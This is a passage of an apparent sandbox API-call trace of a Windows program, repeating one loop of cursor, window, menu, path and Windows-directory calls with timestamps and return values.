lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.559] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.559] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.559] GetMenu (hWnd=0x0) returned 0x0 [0027.559] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.559] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.559] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.559] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.559] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.559] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.559] GetStockObject (i=6) returned 0x1b00018 [0027.559] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.559] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.559] PathFileExistsW (pszPath=0x0) returned 0 [0027.559] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.559] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.560] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.560] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.560] GetMenu (hWnd=0x0) returned 0x0 [0027.560] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.560] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.560] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.560] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.560] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.560] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.560] GetStockObject (i=6) returned 0x1b00018 [0027.560] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.560] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.560] PathFileExistsW (pszPath=0x0) returned 0 [0027.560] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.560] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.560] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.560] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.560] GetMenu (hWnd=0x0) returned 0x0 [0027.560] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.560] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.560] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.560] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.560] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.560] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.560] GetStockObject (i=6) returned 0x1b00018 [0027.560] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.560] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.560] PathFileExistsW (pszPath=0x0) returned 0 [0027.560] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.560] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.560] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.560] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.561] GetMenu (hWnd=0x0) returned 0x0 [0027.561] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1b8) returned -1 [0027.561] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.561] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.561] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.561] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.561] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.561] GetStockObject (i=6) returned 0x1b00018 [0027.561] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.561] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.561] PathFileExistsW (pszPath=0x0) returned 0 [0027.561] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.561] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.561] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.561] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.561] GetMenu (hWnd=0x0) returned 0x0 [0027.561] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.561] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.561] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.561] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.561] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.561] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.561] GetStockObject (i=6) returned 0x1b00018 [0027.561] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.561] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.561] PathFileExistsW (pszPath=0x0) returned 0 [0027.561] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.561] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.561] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.561] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.561] GetMenu (hWnd=0x0) returned 0x0 [0027.561] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.561] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.562] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.562] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.562] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.562] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.562] GetStockObject (i=6) returned 0x1b00018 [0027.562] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.562] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.562] PathFileExistsW (pszPath=0x0) returned 0 [0027.562] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.562] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.562] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.562] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.562] GetMenu (hWnd=0x0) returned 0x0 [0027.562] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.562] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.562] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.562] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.562] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.562] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.562] GetStockObject (i=6) returned 0x1b00018 [0027.562] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.562] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.562] PathFileExistsW (pszPath=0x0) returned 0 [0027.562] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.562] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.562] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.562] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.562] GetMenu (hWnd=0x0) returned 0x0 [0027.562] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.562] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.562] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.562] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.562] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.562] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.563] GetStockObject (i=6) returned 0x1b00018 [0027.563] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.563] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.563] PathFileExistsW (pszPath=0x0) returned 0 [0027.563] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.563] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.563] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.563] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.563] GetMenu (hWnd=0x0) returned 0x0 [0027.563] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x404) returned -1 [0027.563] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.563] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.563] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.563] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.563] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.563] GetStockObject (i=6) returned 0x1b00018 [0027.563] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.563] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.563] PathFileExistsW (pszPath=0x0) returned 0 [0027.563] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.563] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.563] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.563] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.563] GetMenu (hWnd=0x0) returned 0x0 [0027.563] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.563] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.563] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.563] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.563] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.563] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.563] GetStockObject (i=6) returned 0x1b00018 [0027.563] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.563] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.563] PathFileExistsW (pszPath=0x0) returned 0 [0027.564] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.564] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.564] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.564] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.564] GetMenu (hWnd=0x0) returned 0x0 [0027.564] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.564] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.564] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.564] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.564] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.564] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.564] GetStockObject (i=6) returned 0x1b00018 [0027.564] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.564] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.564] PathFileExistsW (pszPath=0x0) returned 0 [0027.564] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.564] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.564] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.564] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.564] GetMenu (hWnd=0x0) returned 0x0 [0027.564] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.564] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.564] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.564] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.564] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.564] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.564] GetStockObject (i=6) returned 0x1b00018 [0027.564] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.564] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.564] PathFileExistsW (pszPath=0x0) returned 0 [0027.564] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.564] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.564] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.565] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.565] GetMenu (hWnd=0x0) returned 0x0 [0027.565] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.565] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.565] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.565] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.565] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.565] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.565] GetStockObject (i=6) returned 0x1b00018 [0027.565] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.565] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.565] PathFileExistsW (pszPath=0x0) returned 0 [0027.565] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.565] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.565] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.565] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.565] GetMenu (hWnd=0x0) returned 0x0 [0027.565] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x315) returned -1 [0027.565] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.565] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.565] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.565] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.565] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.565] GetStockObject (i=6) returned 0x1b00018 [0027.565] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.565] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.565] PathFileExistsW (pszPath=0x0) returned 0 [0027.565] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.565] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.565] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.565] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.565] GetMenu (hWnd=0x0) returned 0x0 [0027.565] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.566] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.566] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.566] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.566] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.566] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.566] GetStockObject (i=6) returned 0x1b00018 [0027.566] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.566] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.566] PathFileExistsW (pszPath=0x0) returned 0 [0027.566] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.566] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.566] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.566] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.566] GetMenu (hWnd=0x0) returned 0x0 [0027.566] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.566] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.566] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.566] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.566] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.566] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.566] GetStockObject (i=6) returned 0x1b00018 [0027.566] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.566] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.566] PathFileExistsW (pszPath=0x0) returned 0 [0027.566] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.566] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.566] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.566] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.566] GetMenu (hWnd=0x0) returned 0x0 [0027.566] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.566] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.566] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.566] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.566] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.566] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.567] GetStockObject (i=6) returned 0x1b00018 [0027.567] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.567] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.567] PathFileExistsW (pszPath=0x0) returned 0 [0027.567] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.567] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.567] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.567] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.567] GetMenu (hWnd=0x0) returned 0x0 [0027.567] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.567] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.567] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.567] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.567] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.567] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.567] GetStockObject (i=6) returned 0x1b00018 [0027.567] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.567] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.567] PathFileExistsW (pszPath=0x0) returned 0 [0027.567] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.567] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.567] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.567] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.567] GetMenu (hWnd=0x0) returned 0x0 [0027.567] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x174) returned -1 [0027.567] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.567] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.567] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.567] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.567] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.567] GetStockObject (i=6) returned 0x1b00018 [0027.567] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.567] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.568] PathFileExistsW (pszPath=0x0) returned 0 [0027.568] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.568] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.568] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.568] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.568] GetMenu (hWnd=0x0) returned 0x0 [0027.568] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.568] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.568] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.568] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.568] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.568] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.568] GetStockObject (i=6) returned 0x1b00018 [0027.568] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.568] PathAppendA (in: pszPath=0x0, pMore=0x0 | 